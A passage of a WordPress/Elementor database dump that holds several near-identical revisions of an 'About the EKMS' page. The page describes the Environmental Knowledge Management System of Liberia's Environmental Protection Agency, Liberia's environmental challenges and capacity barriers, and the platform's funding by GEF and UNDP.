created?\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"654b3cf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and other Liberia government institutions as well as Nongovernmental Organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.<\\/p>\\n<p>The EKMS is an output of the Cross-Cutting Capacity Development Project (CCCD). The project funded by the GEF and implemented by the EPA in partnership with the UNDP in collaboration with Natural Resources Management Agencies of Liberia. The project is in line with GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.<\\/p>\\n<h3>Development Challenge<\\/h3>\\n<h4>A1. Global Environmental Challenges<\\/h4>\\n<p>Liberia is located on the southwest coast of Africa, and boarders the Ivory Coast, Guinea, and Sierra Leone. Liberia is divided into 15 counties, which are subdivided into 90 districts. Although Liberia is a rather small country, it has significant biodiversity. There are 600 bird species, 150 mammals, 75 reptiles and over 2000 flowering plants. Some notable species in Liberia include western chimpanzees, forest elephants, and leopards. Liberia also has rich forests; around 42% of the Upper Guinea Forest of West Africa is contained within Liberia (Republic of Liberia, 2014; Republic of Liberia, 2004). Liberia also has numerous natural resources such as timber, rubber, gold diamonds, and iron ore. Economically, the forestry and agriculture sectors are two of the most important sectors in Liberia. Agriculture accounts for over 70% of livelihoods (Dorliae, 2012).<\\/p>\\n<p>Liberia faces numerous environmental challenges including land degradation, fragmentation, deforestation, soil erosion, and pollution. The dependence on forestry presents a unique environmental risk as Liberia\\u2019s forest is part of the West African Hotspot. This (once) rich ecosystem has faced severe deforestation; only ten percent of the original forest remains, of which around 40% lies in Liberia. Unfortunately, this remaining forest is at risk serious risk of deforestation. Over the past two centuries, Liberia has lost over 60% of its forest cover (Republic of Liberia, 2004), and deforestation rates have increased since 2000. Increases in deforestation and land degradation are largely due to displaced people clearing land. Also contributing to deforestation, biodiversity loss, and land degradation is unsustainable farming practices, mining, charcoal production, invasive species, hunting, and unregulated timber extraction. Poaching is also rampant and mitigation measures are lacking; the draft Wildlife Management and Protected Areas Act remains in draft form (Dorliae, 2012).<\\/p>\\n<p>Climate change also poses a real threat to Liberia. Among other threats, Liberia\\u2019s economy and human health could be threatened by rising temperatures and water scarcity. Currently, the country does not have strong capacities for mitigation and adaptation; Liberia has no institutions that offer climate change education or research programs (although, the University of Liberia does offer programs on the environment). Additionally, there are no organized or coordinated programs for meteorological, hydrological, or climate research and observation. Currently, only fragmented services are available. Along with a lack of observation networks, government bodies are hindered by inadequately-trained staff (Environmental Protection Agency of Liberia, 2013).<\\/p>\\n<p>Although aware of the environmental situation, Liberia has struggled to address these environmental issues. The civil wars, which lasted for more than 10 years, served to exacerbate the situation. Poverty also presents a serious challenge; causing degradation and drawing attention and resources from environmental concerns. Over 60% of Liberians live in poverty. Of these, over 40% of citizens live in extreme poverty (Dorliae, 2012). The outbreak of Ebola in 2014 also threatened Liberia\\u2019s progress, as the crisis became a priority for the government and stretched already limited resources. Fortunately in January 2016 the outbreak was declared resolved. Overall, there has been slow progress in sustainable development and meeting obligations under the Rio Conventions.<\\/p>\\n<h4>Root Causes<\\/h4>\\n<p>There are a few key root causes of environmental degradation in Liberia. The most critical include: human settlements and population pressures; shifting cultivation; timber exploitation; and rubber plantations. More generally, root causes are related to over-exploitation of biological resources; poverty; political instability and wars; education; and inadequate law enforcement (Republic of Liberia, 2004). From a reporting perspective, one root cause of Liberia\\u2019s development challenges is the fact that Focal Points are located in different agencies, which thereby limits coordination and collaboration between them.<\\/p>\\n<h4>A2. Capacity Barriers<\\/h4>\\n<p>Liberia has undertaken numerous initiatives to address environmental issues. Despite the achievements Liberia made, Liberia continues to face important challenges to meeting environmental goals. As a Rio Convention mainstreaming project, the proposed strategy sets out to meet barriers identified in Liberia\\u2019s 2006 National Capacity Self-Assessment (NCSA), which was undertaken though a consultative process and participatory approach that involved numerous stakeholders from various sectors. Through the inclusive and consultative process of the NCSA, stakeholders identified a number of areas that explain the difficulty in fulfilling the obligations of the Rio Conventions. The NCSA identified the following barriers that cut across the three Rio Conventions:<\\/p>\\n<ul>\\n<li style=\\\"list-style-type: none\\\">\\n<ul>\\n<li style=\\\"list-style-type: none;\\\">\\n<ul>\\n<li>Inadequate public awareness and education\\/training<\\/li>\\n<li>Inadequate institutions and institutional frameworks<\\/li>\\n<li>Inadequate political commitment<\\/li>\\n<li>Inadequate planning skills and resources, as well as incomplete structures at all levels of policy implementation<\\/li>\\n<li>Inadequate financial resources and economic framework<\\/li>\\n<li>Inadequate strategic plans and implementation<\\/li>\\n<li>Inadequate access to information<\\/li>\\n<li>Inadequate policies and legal frameworks<\\/li>\\n<li>Low level of involvement of civil society<\\/li>\\n<li>Inadequate natural resources management systems<\\/li>\\n<li>Lack of institutional capacities<\\/li>\\n<li>Lack of effective mechanism for information processing and sharing<\\/li>\\n<li>\\n<p>Poor governance<\\/p>\\n<\\/li>\\n<\\/ul>\\n<\\/li>\\n<\\/ul>\\n<\\/li>\\n<\\/ul>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"25aa8f3\",\"elType\":\"widget\",\"settings\":{\"title\":\"What does the EKMS include?\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7766\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<!-- wp:paragraph -->\\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions \\u2013 The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution\\u2019s technical documents, and other related materials.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.<\\/p>\\n<!-- \\/wp:paragraph -->\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"51302d0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Acknowledgement\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7a9dbae\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EPA gratefully acknowledges financial support from the United Nations Development Programme (UNDP) - the Global Environmental Facility (GEF) for the development of this Environmental Knowledge Management System (EKMS).<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"8a1ae94\",\"elType\":\"widget\",\"settings\":{\"title\":\"Disclaimer\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3162138\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System (EKMS) provides free and open access to important information from key government and other institutions in Liberia on implementation of the Rio Conventions. The information in the EKMS is provided for informational and educational purposes only. This website contents can not be taken to reflect the views of its sponsors.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(12001,1950,'_elementor_edit_mode','builder'),(12002,1950,'_elementor_template_type','wp-page'),(12003,1950,'_elementor_version','2.7.5'),(12004,1950,'_wp_page_template','default'),(12005,1950,'_elementor_data','[{\"id\":\"2ca8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c9f4c2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"63c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9149b81\",\"elType\":\"widget\",\"settings\":{\"title\":\"About the EKMS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7102f3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.36)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"e346601\",\"elType\":\"widget\",\"settings\":{\"title\":\"Why was the EKMS created?\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"654b3cf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and other Liberia government institutions as well as Nongovernmental Organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.<\\/p>\\n<p>The EKMS is an output of the Cross-Cutting Capacity Development Project (CCCD). The project funded by the GEF and implemented by the EPA in partnership with the UNDP in collaboration with Natural Resources Management Agencies of Liberia. The project is in line with GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.<\\/p>\\n<h3>Development Challenge<\\/h3>\\n<h4>A1. Global Environmental Challenges<\\/h4>\\n<p>Liberia is located on the southwest coast of Africa, and boarders the Ivory Coast, Guinea, and Sierra Leone. Liberia is divided into 15 counties, which are subdivided into 90 districts. Although Liberia is a rather small country, it has significant biodiversity. There are 600 bird species, 150 mammals, 75 reptiles and over 2000 flowering plants. Some notable species in Liberia include western chimpanzees, forest elephants, and leopards. Liberia also has rich forests; around 42% of the Upper Guinea Forest of West Africa is contained within Liberia (Republic of Liberia, 2014; Republic of Liberia, 2004). Liberia also has numerous natural resources such as timber, rubber, gold diamonds, and iron ore. Economically, the forestry and agriculture sectors are two of the most important sectors in Liberia. Agriculture accounts for over 70% of livelihoods (Dorliae, 2012).<\\/p>\\n<p>Liberia faces numerous environmental challenges including land degradation, fragmentation, deforestation, soil erosion, and pollution. The dependence on forestry presents a unique environmental risk as Liberia\\u2019s forest is part of the West African Hotspot. This (once) rich ecosystem has faced severe deforestation; only ten percent of the original forest remains, of which around 40% lies in Liberia. Unfortunately, this remaining forest is at risk serious risk of deforestation. Over the past two centuries, Liberia has lost over 60% of its forest cover (Republic of Liberia, 2004), and deforestation rates have increased since 2000. Increases in deforestation and land degradation are largely due to displaced people clearing land. Also contributing to deforestation, biodiversity loss, and land degradation is unsustainable farming practices, mining, charcoal production, invasive species, hunting, and unregulated timber extraction. Poaching is also rampant and mitigation measures are lacking; the draft Wildlife Management and Protected Areas Act remains in draft form (Dorliae, 2012).<\\/p>\\n<p>Climate change also poses a real threat to Liberia. Among other threats, Liberia\\u2019s economy and human health could be threatened by rising temperatures and water scarcity. Currently, the country does not have strong capacities for mitigation and adaptation; Liberia has no institutions that offer climate change education or research programs (although, the University of Liberia does offer programs on the environment). Additionally, there are no organized or coordinated programs for meteorological, hydrological, or climate research and observation. Currently, only fragmented services are available. Along with a lack of observation networks, government bodies are hindered by inadequately-trained staff (Environmental Protection Agency of Liberia, 2013).<\\/p>\\n<p>Although aware of the environmental situation, Liberia has struggled to address these environmental issues. The civil wars, which lasted for more than 10 years, served to exacerbate the situation. Poverty also presents a serious challenge; causing degradation and drawing attention and resources from environmental concerns. Over 60% of Liberians live in poverty. Of these, over 40% of citizens live in extreme poverty (Dorliae, 2012). The outbreak of Ebola in 2014 also threatened Liberia\\u2019s progress, as the crisis became a priority for the government and stretched already limited resources. Fortunately in January 2016 the outbreak was declared resolved. Overall, there has been slow progress in sustainable development and meeting obligations under the Rio Conventions.<\\/p>\\n<h4>Root Causes<\\/h4>\\n<p>There are a few key root causes of environmental degradation in Liberia. The most critical include: human settlements and population pressures; shifting cultivation; timber exploitation; and rubber plantations. More generally, root causes are related to over-exploitation of biological resources; poverty; political instability and wars; education; and inadequate law enforcement (Republic of Liberia, 2004). From a reporting perspective, one root cause of Liberia\\u2019s development challenges is the fact that Focal Points are located in different agencies, which thereby limits coordination and collaboration between them.<\\/p>\\n<h4>A2. Capacity Barriers<\\/h4>\\n<p>Liberia has undertaken numerous initiatives to address environmental issues. Despite the achievements Liberia made, Liberia continues to face important challenges to meeting environmental goals. As a Rio Convention mainstreaming project, the proposed strategy sets out to meet barriers identified in Liberia\\u2019s 2006 National Capacity Self-Assessment (NCSA), which was undertaken though a consultative process and participatory approach that involved numerous stakeholders from various sectors. Through the inclusive and consultative process of the NCSA, stakeholders identified a number of areas that explain the difficulty in fulfilling the obligations of the Rio Conventions. The NCSA identified the following barriers that cut across the three Rio Conventions:<\\/p>\\n<ul>\\n<li style=\\\"list-style-type: none\\\">\\n<ul>\\n<li style=\\\"list-style-type: none;\\\">\\n<ul>\\n<li>Inadequate public awareness and education\\/training<\\/li>\\n<li>Inadequate institutions and institutional frameworks<\\/li>\\n<li>Inadequate political commitment<\\/li>\\n<li>Inadequate planning skills and resources, as well as incomplete structures at all levels of policy implementation<\\/li>\\n<li>Inadequate financial resources and economic framework<\\/li>\\n<li>Inadequate strategic plans and implementation<\\/li>\\n<li>Inadequate access to information<\\/li>\\n<li>Inadequate policies and legal frameworks<\\/li>\\n<li>Low level of involvement of civil society<\\/li>\\n<li>Inadequate natural resources management systems<\\/li>\\n<li>Lack of institutional capacities<\\/li>\\n<li>Lack of effective mechanism for information processing and sharing<\\/li>\\n<li>\\n<p>Poor governance<\\/p>\\n<\\/li>\\n<\\/ul>\\n<\\/li>\\n<\\/ul>\\n<\\/li>\\n<\\/ul>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"265f48f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Liberia\\u2019s Agenda for Transformation 2012-2017 confirmed many of the barriers identified in the NCSA. Specifically, the agenda noted the following barriers:<\\/p>\\u2022 Weak technical, administrative and managerial capacities; \\u2022 Weak institutional coordination; \\u2022 Unclear policies and mechanisms to enable effective participation by especially non-state actors; at the national and local levels; \\u2022 Limited stakeholder participation in planning and decision-making processes; \\u2022 Limited dissemination of key information (Republic of Liberia, 2013). Barriers were also reaffirmed in the Liberia Constraints Analysis (Government of Liberia, 2013).<\\/p>\\n\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"25aa8f3\",\"elType\":\"widget\",\"settings\":{\"title\":\"What does the EKMS include?\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9c544f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<!-- wp:paragraph -->\\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions \\u2013 The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution\\u2019s technical documents, and other related materials.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.<\\/p>\\n<!-- \\/wp:paragraph -->\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"51302d0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Acknowledgement\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7a9dbae\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EPA gratefully acknowledges financial support from the United Nations Development Programme (UNDP) - the Global Environmental Facility (GEF) for the development of this Environmental Knowledge Management System (EKMS).<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"8a1ae94\",\"elType\":\"widget\",\"settings\":{\"title\":\"Disclaimer\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3162138\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System (EKMS) provides free and open access to important information from key government and other institutions in Liberia on implementation of the Rio Conventions. The information in the EKMS is provided for informational and educational purposes only. This website contents can not be taken to reflect the views of its sponsors.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(12013,1952,'_elementor_edit_mode','builder'),(12014,1952,'_elementor_template_type','wp-page'),(12015,1952,'_elementor_version','2.7.5'),(12016,1952,'_wp_page_template','default'),(12017,1952,'_elementor_data','[{\"id\":\"2ca8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c9f4c2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"63c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9149b81\",\"elType\":\"widget\",\"settings\":{\"title\":\"About the EKMS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7102f3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.36)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"e346601\",\"elType\":\"widget\",\"settings\":{\"title\":\"Why was the EKMS created?\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"654b3cf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and other Liberia government institutions as well as Nongovernmental Organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.<\\/p>\\n<p>The EKMS is an output of the Cross-Cutting Capacity Development Project (CCCD). The project funded by the GEF and implemented by the EPA in partnership with the UNDP in collaboration with Natural Resources Management Agencies of Liberia. The project is in line with GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.<\\/p>\\n<h3>Development Challenge<\\/h3>\\n<h4>A1. Global Environmental Challenges<\\/h4>\\n<p>Liberia is located on the southwest coast of Africa, and boarders the Ivory Coast, Guinea, and Sierra Leone. Liberia is divided into 15 counties, which are subdivided into 90 districts. Although Liberia is a rather small country, it has significant biodiversity. There are 600 bird species, 150 mammals, 75 reptiles and over 2000 flowering plants. Some notable species in Liberia include western chimpanzees, forest elephants, and leopards. Liberia also has rich forests; around 42% of the Upper Guinea Forest of West Africa is contained within Liberia (Republic of Liberia, 2014; Republic of Liberia, 2004). Liberia also has numerous natural resources such as timber, rubber, gold diamonds, and iron ore. Economically, the forestry and agriculture sectors are two of the most important sectors in Liberia. Agriculture accounts for over 70% of livelihoods (Dorliae, 2012).<\\/p>\\n<p>Liberia faces numerous environmental challenges including land degradation, fragmentation, deforestation, soil erosion, and pollution. The dependence on forestry presents a unique environmental risk as Liberia\\u2019s forest is part of the West African Hotspot. This (once) rich ecosystem has faced severe deforestation; only ten percent of the original forest remains, of which around 40% lies in Liberia. Unfortunately, this remaining forest is at risk serious risk of deforestation. Over the past two centuries, Liberia has lost over 60% of its forest cover (Republic of Liberia, 2004), and deforestation rates have increased since 2000. Increases in deforestation and land degradation are largely due to displaced people clearing land. Also contributing to deforestation, biodiversity loss, and land degradation is unsustainable farming practices, mining, charcoal production, invasive species, hunting, and unregulated timber extraction. Poaching is also rampant and mitigation measures are lacking; the draft Wildlife Management and Protected Areas Act remains in draft form (Dorliae, 2012).<\\/p>\\n<p>Climate change also poses a real threat to Liberia. Among other threats, Liberia\\u2019s economy and human health could be threatened by rising temperatures and water scarcity. Currently, the country does not have strong capacities for mitigation and adaptation; Liberia has no institutions that offer climate change education or research programs (although, the University of Liberia does offer programs on the environment). Additionally, there are no organized or coordinated programs for meteorological, hydrological, or climate research and observation. Currently, only fragmented services are available. Along with a lack of observation networks, government bodies are hindered by inadequately-trained staff (Environmental Protection Agency of Liberia, 2013).<\\/p>\\n<p>Although aware of the environmental situation, Liberia has struggled to address these environmental issues. The civil wars, which lasted for more than 10 years, served to exacerbate the situation. Poverty also presents a serious challenge; causing degradation and drawing attention and resources from environmental concerns. Over 60% of Liberians live in poverty. Of these, over 40% of citizens live in extreme poverty (Dorliae, 2012). The outbreak of Ebola in 2014 also threatened Liberia\\u2019s progress, as the crisis became a priority for the government and stretched already limited resources. Fortunately in January 2016 the outbreak was declared resolved. Overall, there has been slow progress in sustainable development and meeting obligations under the Rio Conventions.<\\/p>\\n<h4>Root Causes<\\/h4>\\n<p>There are a few key root causes of environmental degradation in Liberia. The most critical include: human settlements and population pressures; shifting cultivation; timber exploitation; and rubber plantations. More generally, root causes are related to over-exploitation of biological resources; poverty; political instability and wars; education; and inadequate law enforcement (Republic of Liberia, 2004). From a reporting perspective, one root cause of Liberia\\u2019s development challenges is the fact that Focal Points are located in different agencies, which thereby limits coordination and collaboration between them.<\\/p>\\n<h4>A2. Capacity Barriers<\\/h4>\\n<p>Liberia has undertaken numerous initiatives to address environmental issues. Despite the achievements Liberia made, Liberia continues to face important challenges to meeting environmental goals. As a Rio Convention mainstreaming project, the proposed strategy sets out to meet barriers identified in Liberia\\u2019s 2006 National Capacity Self-Assessment (NCSA), which was undertaken though a consultative process and participatory approach that involved numerous stakeholders from various sectors. Through the inclusive and consultative process of the NCSA, stakeholders identified a number of areas that explain the difficulty in fulfilling the obligations of the Rio Conventions. The NCSA identified the following barriers that cut across the three Rio Conventions:<\\/p>\\n<ul>\\n<li style=\\\"list-style-type: none\\\">\\n<ul>\\n<li style=\\\"list-style-type: none;\\\">\\n<ul>\\n<li>Inadequate public awareness and education\\/training<\\/li>\\n<li>Inadequate institutions and institutional frameworks<\\/li>\\n<li>Inadequate political commitment<\\/li>\\n<li>Inadequate planning skills and resources, as well as incomplete structures at all levels of policy implementation<\\/li>\\n<li>Inadequate financial resources and economic framework<\\/li>\\n<li>Inadequate strategic plans and implementation<\\/li>\\n<li>Inadequate access to information<\\/li>\\n<li>Inadequate policies and legal frameworks<\\/li>\\n<li>Low level of involvement of civil society<\\/li>\\n<li>Inadequate natural resources management systems<\\/li>\\n<li>Lack of institutional capacities<\\/li>\\n<li>Lack of effective mechanism for information processing and sharing<\\/li>\\n<li>\\n<p>Poor governance<\\/p>\\n<\\/li>\\n<\\/ul>\\n<\\/li>\\n<\\/ul>\\n<\\/li>\\n<\\/ul>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"265f48f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Liberia\\u2019s Agenda for Transformation 2012-2017 confirmed many of the barriers identified in the NCSA. Specifically, the agenda noted the following barriers:<\\/p>\\n<ul>\\n<li>Weak technical, administrative and managerial capacities;<\\/li>\\n<li>Weak institutional coordination;<\\/li>\\n<li>Unclear policies and mechanisms to enable effective participation by especially non-state actors; at the national and local levels;<\\/li>\\n<li>Limited stakeholder participation in planning and decision-making processes;<\\/li>\\n<li>Limited dissemination of key information (Republic of Liberia, 2013).<\\/li>\\n<\\/ul>\\n<p>Barriers were also reaffirmed in the Liberia Constraints Analysis (Government of Liberia, 2013).<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"25aa8f3\",\"elType\":\"widget\",\"settings\":{\"title\":\"What does the EKMS include?\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9c544f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<!-- wp:paragraph -->\\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions \\u2013 The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution\\u2019s technical documents, and other related materials.<\\/p>\\n<!-- \\/wp:paragraph -->\\n\\n<!-- wp:paragraph -->\\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.<\\/p>\\n<!-- \\/wp:paragraph -->\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"51302d0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Acknowledgement\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7a9dbae\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EPA gratefully acknowledges financial support from the United Nations Development Programme (UNDP) - the Global Environmental Facility (GEF) for the development of this Environmental Knowledge Management System (EKMS).<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"8a1ae94\",\"elType\":\"widget\",\"settings\":{\"title\":\"Disclaimer\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3162138\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System (EKMS) provides free and open access to important information from key government and other institutions in Liberia on implementation of the Rio Conventions. The information in the EKMS is provided for informational and educational purposes only. This website contents can not be taken to reflect the views of its sponsors.<\\/p>\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(12025,1954,'_elementor_edit_mode','builder'),(12026,1954,'_elementor_template_type','wp-page'),(12027,1954,'_elementor_version','2.7.5'),(12028,1954,'_wp_page_template','default'),(12029,1954,'_elementor_data','[{\"id\":\"2ca8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c9f4c2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"63c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9149b81\",\"elType\":\"widget\",\"settings\":{\"title\":\"About the EKMS\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7102f3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.36)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"e346601\",\"elType\":\"widget\",\"settings\":{\"title\":\"Why was the EKMS 